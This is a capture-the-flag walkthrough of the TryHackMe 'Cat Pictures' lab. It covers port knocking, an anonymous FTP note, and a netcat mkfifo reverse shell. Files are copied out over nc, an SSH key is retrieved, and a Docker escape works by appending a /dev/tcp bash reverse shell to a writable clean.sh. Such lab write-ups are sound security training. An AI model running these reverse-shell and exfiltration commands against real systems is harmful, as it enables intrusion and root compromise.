Machine Link: Cat Pictures
I was just browsing through TryHackMe and this picture had me intrigued.
So I launched the machine, and started off with the warmup (i.e. Nmap).
┌──(kali㉿kali)-[~]
└─$ nmap -T4 -v -A 10.10.248.4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-09 12:15 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
Initiating NSE at 12:15
Completed NSE at 12:15, 0.00s elapsed
Initiating Ping Scan at 12:15
Scanning 10.10.248.4 [2 ports]
Completed Ping Scan at 12:15, 0.46s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:15
Completed Parallel DNS resolution of 1 host. at 12:15, 0.01s elapsed
Initiating Connect Scan at 12:15
Scanning 10.10.248.4 [1000 ports]
Discovered open port 22/tcp on 10.10.248.4
Discovered open port 8080/tcp on 10.10.248.4
Connect Scan Timing: About 31.35% done; ETC: 12:17 (0:01:08 remaining)
Increasing send delay for 10.10.248.4 from 0 to 5 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.248.4 from 5 to 10 due to max_successful_tryno increase to 6
Warning: 10.10.248.4 giving up on port because retransmission cap hit (6).
Completed Connect Scan at 12:16, 68.32s elapsed (1000 total ports)
Initiating Service scan at 12:16
Scanning 2 services on 10.10.248.4
Completed Service scan at 12:16, 10.91s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.248.4.
Initiating NSE at 12:16
Completed NSE at 12:17, 13.30s elapsed
Initiating NSE at 12:17
Completed NSE at 12:17, 2.00s elapsed
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Nmap scan report for 10.10.248.4
Host is up (0.42s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 37436480d35a746281b7806b1a23d84a (RSA)
| 256 53c682efd27733efc13d9c1513540eb2 (ECDSA)
|_ 256 ba97c323d4f2cc082ce12b3006189541 (ED25519)
163/tcp filtered cmip-man
1236/tcp filtered bvcontrol
1717/tcp filtered fj-hdnet
2522/tcp filtered windb
4550/tcp filtered gds-adppiw-db
8080/tcp open http Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: Cat Pictures - Index page
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
49159/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.93 seconds
So this machine comes with a bunch of ports including 8080 so lets look into the website.
I was expecting forums full of cattos but oh well. Lets look further into it.
The website gives a hint of Knock knock! Magic Numbers: 1111, 2222, 3333, 4444 which seems like port numbers so lets try Port Knocking.
Port Knocking is basically trying to access a filtered port in order to unlock it open. I’m using a tool called knockd to hit the ports.
┌──(kali㉿kali)-[~]
└─$ knock 10.10.248.4 -v 1111 2222 3333 4444
hitting tcp 10.10.248.4:1111
hitting tcp 10.10.248.4:2222
hitting tcp 10.10.248.4:3333
hitting tcp 10.10.248.4:4444
After knocking on these ports lets do a nmap scan again and we’ll see ftp port now being opened.
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.13.29.133
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|*End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|*-rw-r--r-- 1 ftp ftp 162 Apr 02 2021 note.txt
The nmap scan even shows a note.txt file through the anonymous ftp login so after picking it up from the ftp it shows the following content.
In case I forget my password, I'm leaving a pointer to the internal shell service on the server.
Connect to port 4420, the password is [password].
- catlover
The note straight up tells us to login to port 4420 with the given password.
┌──(kali㉿kali)-[~]
└─$ nc 10.10.248.4 4420
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
[password]
Password accepted
ls
bin
etc
home
lib
lib64
opt
tmp
usr
ls home
catlover
ls home/catlover
runme
After logging in and roaming around a bit we find the shell to be a bit limited with a directory called catlover with a runme file inside.
./home/catlover/runme
THIS EXECUTABLE DOES NOT WORK UNDER THE INTERNAL SHELL, YOU NEED A REGULAR SHELL.
Upon running the file it asks us to run it with a Regular Shell. So lets try to get one.
ls usr/bin
mkfifo
touch
wget
Digging a little further, we see that the machine can run mkfifo, touch and wget. Since touch is to make files and wget and only get from ftp,http and https port we gotta go with mkfifo so lets take help from revshells.com and make a reverse shell using the nc mkfifo method.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.13.29.133 9001 >/tmp/f
Start a netcat listener and get the reverse shell.
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.13.29.133] from (UNKNOWN) [10.10.248.4] 56820
sh: 0: can't access tty; job control turned off
# ls
bin
etc
home
lib
lib64
opt
tmp
usr
With the new shell. Lets pick the runme file by running the following command.
nc [YOUR MACHINE IP] 443 < home/catlover/runme
Then start a netcat listener on your machine.
nc -nlvp 443 > runme
After making the connection just Ctrl+C it and you’ll see the runme file on your machine.
┌──(kali㉿kali)-[~]
└─$ chmod +x runme
┌──(kali㉿kali)-[~]
└─$ ./runme
Please enter yout password: [password]
Access Denied
By trying to run it with the same old password it denies the access. Gotta analyze it. Lets use strings for that.
┌──(kali㉿kali)-[~]
└─$ strings runme
/lib64/ld-linux-x86-64.so.2
__gmon_start__
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
_ZNSaIcED1Ev
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1Ev
_ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_
_ZSt3cin
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1EPKcRKS3_
_ZNSt8ios_base4InitD1Ev
_ZNSolsEPFRSoS_E
__gxx_personality_v0
_ZNSaIcEC1Ev
_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4dataEv
_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc
_ZNSt8ios_base4InitC1Ev
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev
_ZSt4cout
_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4sizeEv
_ZStrsIcSt11char_traitsIcESaIcEERSt13basic_istreamIT_T0_ES7_RNSt7__cxx1112basic_stringIS4_S5_T1_EE
_Unwind_Resume
__stack_chk_fail
__cxa_atexit
memcmp
system
__cxa_finalize
__libc_start_main
libstdc++.so.6
libgcc_s.so.1
libc.so.6
GCC_3.0
CXXABI_1.3
GLIBCXX_3.4.21
GLIBCXX_3.4
GLIBC_2.4
GLIBC_2.2.5
u+UH
ATSH
[A\]
[]A\A]A^A_
[password]
Please enter yout password:
Welcome, catlover! SSH key transfer queued!
touch /tmp/gibmethesshkey
Access Denied
With this, we can see the password so lets try it out.
┌──(kali㉿kali)-[~]
└─$ ./runme
Please enter yout password: [password]
Welcome, catlover! SSH key transfer queued!
By running it successfully it creates a file /tmp/gibmethesshkey in our tmp folder. The file is of no use to us so lets try running the runme file on the target machine with the password.
# ./home/catlover/runme
Please enter yout password: [password]
Welcome, catlover! SSH key transfer queued!
After doing it, we see that a new id_rsa file has been created.
# ls /home/catlover
id_rsa
runme
id_rsa is a file that serves as a key when logging through ssh. As we see in our nmap scan that we do have a ssh port lets dive into it. Pick the file from server by the same netcat method and run it with ssh.
Pick the id_rsa file by running the following command.
nc [YOUR MACHINE IP] 443 < home/catlover/id_rsa
Then start a netcat listener on your machine.
nc -nlvp 443 > id_rsa
After making the connection just Ctrl+C it and you’ll see the id_rsa file on your machine. Fix the permissions on it.
┌──(kali㉿kali)-[~]
└─$ chmod 600 id_rsa
Time to do ssh.
┌──(kali㉿kali)-[~]
└─$ ssh catlover@10.10.248.4 -i id_rsa
The authenticity of host '10.10.248.4 (10.10.248.4)' can't be established.
ED25519 key fingerprint is SHA256:1eaD00/uot2wrnOhWADr5ZbjIDs9twYBymqkwtQKXk0.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.248.4' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-142-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Sep 9 11:15:03 PDT 2023
System load: 0.79 Users logged in: 0
Usage of /: 37.2% of 19.56GB IP address for eth0: 10.10.248.4
Memory usage: 34% IP address for br-98674f8f20f9: 172.18.0.1
Swap usage: 0% IP address for docker0: 172.17.0.1
Processes: 109
52 updates can be applied immediately.
25 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
Last login: Fri Jun 4 14:40:35 2021
root@7546fa2336d6:/#
Aaaaand we got the shell.
root@7546fa2336d6:/# ls root
flag.txt
root@7546fa2336d6:/# cat root/flag.txt
[Flag 1]
root@7546fa2336d6:/# whoami
root
As we can see we got the root with the flag but is the Root Flag itself? Nope. Upon submitting it we see it as being accepted as Flag 1 and not the Root Flag.
That seems sus. Are we inside a docker container as root then? One way to find it out. Look for .dockerenv file in the / directory.
root@7546fa2336d6:/# ls -al
total 108
drwxr-xr-x 1 root root 4096 Mar 25 2021 .
drwxr-xr-x 1 root root 4096 Mar 25 2021 ..
-rw------- 1 root root 588 Jun 4 2021 .bash_history
-rwxr-xr-x 1 root root 0 Mar 25 2021 .dockerenv
Got em! Time to escape this container then. Searching inside of it we find a /opt/clean/clean.sh file. This file seems to be editable so we’ll take advantage of reverse shell here.
root@7546fa2336d6:/opt/clean# echo "bash -i >& /dev/tcp/10.13.29.133/443 0>&1" >> clean.sh
root@7546fa2336d6:/opt/clean# cat clean.sh
#!/bin/bash
rm -rf /tmp/*
bash -i >& /dev/tcp/10.13.29.133/443 0>&1
Adding a reverse shell into the file we now make it executable and run it.
root@7546fa2336d6:/opt/clean# chmod +x clean.sh
root@7546fa2336d6:/opt/clean# ls -al
total 16
drwxr-xr-x 2 root root 4096 May 1 2021 .
drwxrwxr-x 1 root root 4096 Mar 25 2021 ..
-rwxr-xr-x 1 root root 69 Sep 10 10:38 clean.sh
root@7546fa2336d6:/opt/clean# ./clean.sh
Now opening our netcat listener.
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 443
listening on [any] 443 ...
connect to [10.13.29.133] from (UNKNOWN) [10.10.136.91] 54742
bash: cannot set terminal process group (2120): Inappropriate ioctl for device
bash: no job control in this shell
root@cat-pictures:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@cat-pictures:~# whoami
whoami
root
root@cat-pictures:~# hostname
hostname
cat-pictures
Now all we gotta do is see the flag and that’s the end of the road.
root@cat-pictures:~# ls
ls
firewall
root.txt
root@cat-pictures:~# cat root.txt
cat root.txt
Congrats!!!
Here is your flag:
[Root Flag]
Hope you like this walkthrough. Happy Hacking!!
Top comments (0)